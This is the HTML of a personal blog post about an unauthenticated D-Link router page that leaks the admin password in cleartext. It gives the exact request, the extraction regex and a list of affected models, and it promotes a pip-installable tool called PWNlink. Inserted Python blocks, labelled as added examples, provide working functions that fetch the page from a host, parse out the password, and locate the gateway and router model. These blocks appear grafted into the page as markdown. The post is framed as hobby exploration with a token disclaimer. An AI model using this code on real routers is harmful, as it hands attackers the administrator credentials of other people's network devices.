<head>
<title>Evan Pratten</title>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />

<!-- Begin Jekyll SEO tag v2.6.1 -->
<title>I had some fun with a router | Evan Pratten</title>
<meta name="generator" content="Jekyll v4.0.0" />
<meta property="og:title" content="I had some fun with a router" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="cleartext passwords + external management = death wish" />
<meta property="og:description" content="cleartext passwords + external management = death wish" />
<link rel="canonical" href="http://0.0.0.0:4000/blog/2019/06/27/pwnlink" />
<meta property="og:url" content="http://0.0.0.0:4000/blog/2019/06/27/pwnlink" />
<meta property="og:site_name" content="Evan Pratten" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2019-06-27T13:16:00-04:00" />
<script type="application/ld+json">
{"datePublished":"2019-06-27T13:16:00-04:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://0.0.0.0:4000/blog/2019/06/27/pwnlink"},"@type":"BlogPosting","url":"http://0.0.0.0:4000/blog/2019/06/27/pwnlink","headline":"I had some fun with a router","description":"cleartext passwords + external management = death wish","dateModified":"2019-06-27T13:16:00-04:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"
integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="stylesheet" href="/assets/css/github-syntax.css">
<link href="https://fonts.googleapis.com/css?family=IBM+Plex+Mono:400,400i|IBM+Plex+Sans:100,100i,400,400i,700,700i" rel="stylesheet">
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
</head>
<body>

<div class="site-ctr">
<div class="reactive-bg">
<div class="post container">
<h1>I had some fun with a router</h1>
<h4>cleartext passwords + external management = death wish</h4>
<hr>
<p><em>2019-06-27 13:16:00 -0400</em></p>

<br>
<p>I was playing around with some D-Link routers today and remembered an <a href="https://www.exploit-db.com/exploits/33520">ExploitDB entry</a> I read a while ago. Many D-Link routers ship with a "feature" that exposes remote management and configuration queries. Interestingly, it cannot be disabled, and one of the pages it serves contains a cleartext copy of the admin password (yay!).</p>
<h2 id="how-to-get-yourself-an-admin-password">How to get yourself an admin password</h2>
<p>On any supported router, make an HTTP request to <code class="highlighter-rouge">http://your.router.ip.addr/tools_admin.asp/</code>, exactly as written, trailing slash included. This returns a fairly large XML document describing the router's hardware and configuration.</p>

<p>Notice that you did not have to log in. The file appears to be served to a remote management service of some sort, which is why it is exposed without authentication.</p>

<p>The important part: matching the response against the regex <code class="highlighter-rouge">name="user_password_tmp" value="(.*)"></code> yields a single capture group, and that captured string is the admin password of the device.</p>
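<p>To make the extraction step concrete, here is an added Python example. It is not PWNlink's code and not from the original post. <code>fetch_tools_admin()</code> is a plain urllib wrapper for the request above; the parsing runs offline against a constructed response body that imitates the hidden-input layout, with two inputs deliberately placed on one line to show that the greedy <code>(.*)</code> in the post's pattern over-captures there, while a pattern that stops at the next double quote does not.</p>

```python
"""Pull the cleartext admin password out of a D-Link tools_admin.asp/ response.

Added example, not PWNlink's code. fetch_tools_admin() is a convenience
wrapper around urllib; the parsing is exercised offline on a constructed
response body (SAMPLE_BODY) that imitates the hidden-input layout the post
describes. The field name user_password_tmp comes from the post's regex.
"""
import re
import urllib.request
from typing import Optional

# The post's own pattern: greedy '.*' runs to the LAST '">' on the same line.
AUTHOR_PATTERN = re.compile(r'name="user_password_tmp" value="(.*)">')

# Attribute-safe variant: capture up to the next double quote only.
SAFE_PATTERN = re.compile(r'name="user_password_tmp"\s+value="([^"]*)"')

# Constructed sample (not a real capture). Two <input> tags share one line on
# purpose, to show where the greedy pattern goes wrong.
SAMPLE_BODY = (
    '<form name="admin" action="tools_admin.cgi">\n'
    '<input type="hidden" name="user_name" value="admin">'
    '<input type="hidden" name="user_password_tmp" value="hunter2">'
    '<input type="hidden" name="remote_port" value="8080">\n'
    '</form>\n'
)


def extract_password(body: str, pattern: re.Pattern = SAFE_PATTERN) -> Optional[str]:
    """Return the captured user_password_tmp value, or None if it is absent."""
    m = pattern.search(body)
    return m.group(1) if m else None


def fetch_tools_admin(host: str, timeout: float = 5.0) -> str:
    """GET http://<host>/tools_admin.asp/ (trailing slash kept as in the post).

    Network helper only; the offline sample below does not call it.
    """
    url = f"http://{host}/tools_admin.asp/"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Against a single-input-per-line page both patterns agree; against the
    # one-line form above only the attribute-safe pattern returns the password.
    print("author pattern:", extract_password(SAMPLE_BODY, AUTHOR_PATTERN))
    print("safe pattern:  ", extract_password(SAMPLE_BODY))
```

Run it as <code>python3 extract.py</code> to see the two captures side by side; to try it against a real device, call <code>extract_password(fetch_tools_admin("192.168.0.1"))</code> from a network you own.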
<h2 id="supported-routers">Supported routers</h2>
<p>Many D-Link routers expose this. The ones I know about are:</p>
<ul>
<li>DIR-835</li>
<li>DIR-855L</li>
<li>DGL-5500</li>
</ul>

<p>Some routers serve the same XML file but restrict it… to a user account that has no password. These are:</p>
<ul>
<li>DHP-1565</li>
<li>DIR-652</li>
</ul>
<h2 id="pwnlink">PWNlink</h2>
<p>Like everything I play with, I made a script to do all of this for me (and spent a large amount of time adding colours to the text).</p>

<p>My script is called PWNlink (PWN + D-Link). It automatically finds a router on your network by looking for a specific DNS entry that many D-Link routers create, and then checking your default gateway. Next, PWNlink reads the router’s <code class="highlighter-rouge">hnap1</code> config to find its model number. If the model is supported, the script reads and parses the appropriate configs and prints the admin credentials for your router.</p>
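<p>Added example (not PWNlink's code) covering the detection side of this workflow together with the model lists from the previous section: reading the default gateway from <code>/proc/net/route</code> on Linux, pulling the model name out of an HNAP1 GetDeviceSettings reply, and sorting it into the post's two lists. Both the HNAP1 reply and the routing table below are constructed samples, and the GetDeviceSettings element layout is an assumption about the HNAP1 response shape, not something the post specifies.</p>

```python
"""Model detection and gateway discovery in the style of PWNlink's workflow.

Added example; not PWNlink's code. It assumes (1) the router answers
GET /HNAP1/ with a GetDeviceSettings response shaped like SAMPLE_HNAP, and
(2) that the default gateway can be read from /proc/net/route on Linux.
Both samples below are constructed, not captured from real devices.
"""
import socket
import struct
import xml.etree.ElementTree as ET
from typing import Optional

# Model lists exactly as the post gives them.
UNAUTHENTICATED = {"DIR-835", "DIR-855L", "DGL-5500"}   # tools_admin.asp/ open to anyone
BLANK_PASSWORD_USER = {"DHP-1565", "DIR-652"}           # gated by a user with no password

HNAP_NS = "{http://purenetworks.com/HNAP1/}"

# Constructed sample of an HNAP1 GetDeviceSettings reply (assumed shape).
SAMPLE_HNAP = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetDeviceSettingsResponse xmlns="http://purenetworks.com/HNAP1/">
<GetDeviceSettingsResult>OK</GetDeviceSettingsResult>
<VendorName>D-Link</VendorName>
<ModelName>DIR-835</ModelName>
<FirmwareVersion>1.03</FirmwareVersion>
</GetDeviceSettingsResponse>
</soap:Body>
</soap:Envelope>
"""

# Constructed sample of /proc/net/route. Destination 00000000 marks the
# default route; the gateway column is little-endian hex (0101A8C0 -> 192.168.1.1).
SAMPLE_ROUTE = (
    "Iface\tDestination\tGateway \tFlags\tRefCnt\tUse\tMetric\tMask\t\tMTU\tWindow\tIRTT\n"
    "eth0\t00000000\t0101A8C0\t0003\t0\t0\t100\t00000000\t0\t0\t0\n"
    "eth0\t0001A8C0\t00000000\t0001\t0\t0\t100\t00FFFFFF\t0\t0\t0\n"
)


def model_from_hnap(xml_text: str) -> Optional[str]:
    """Extract <ModelName> from an HNAP1 GetDeviceSettings response."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    node = root.find(f".//{HNAP_NS}ModelName")
    return node.text.strip() if node is not None and node.text else None


def classify(model: str) -> str:
    """Map a model name onto the post's two lists."""
    if model in UNAUTHENTICATED:
        return "unauthenticated"
    if model in BLANK_PASSWORD_USER:
        return "blank-password-user"
    return "unknown"


def gateway_from_route_table(table: str) -> Optional[str]:
    """Parse the default gateway out of /proc/net/route text."""
    for line in table.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 3 or fields[1] != "00000000":
            continue
        # The kernel prints the address as little-endian hex; unpack accordingly.
        return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
    return None


def default_gateway() -> Optional[str]:
    """Read the live routing table (Linux only); None elsewhere."""
    try:
        with open("/proc/net/route") as fh:
            return gateway_from_route_table(fh.read())
    except OSError:
        return None


if __name__ == "__main__":
    print("sample gateway:", gateway_from_route_table(SAMPLE_ROUTE))
    model = model_from_hnap(SAMPLE_HNAP)
    print("sample model:", model, "->", classify(model))
```

The live path would be <code>default_gateway()</code>, then an HTTP GET of <code>/HNAP1/</code> on that address fed to <code>model_from_hnap()</code>; only the offline helpers are exercised here.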
<p>PWNlink can be installed on any *nix computer that has both <code class="highlighter-rouge">python3.7</code> and <code class="highlighter-rouge">python3-pip</code> installed. To install PWNlink, run:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pip3 install pwnlink
</code></pre></div></div>

<p>Run the script without any arguments for automatic detection, or pass a router’s IP address to use manual detection.</p>
<h2 id="disclamier-thingy">Disclaimer thingy</h2>
<p>I don’t see much point to these, but I should probably put one anyway.</p>

<p><strong>Don’t be dumb with this script.</strong></p>

<p>I have only used it on my own (or 5024’s) routers, and did not create PWNlink with any malicious intent.</p>
</div>
</div>

</div>

<div class="container foot" style="text-align:center;">
<br>
<span class="site-info">
Site design by: <a href="https://retrylife.ca">Evan Pratten</a> |
This site was last updated at: 2019-11-30 11:37:59 -0500
</span>
</div>
</body>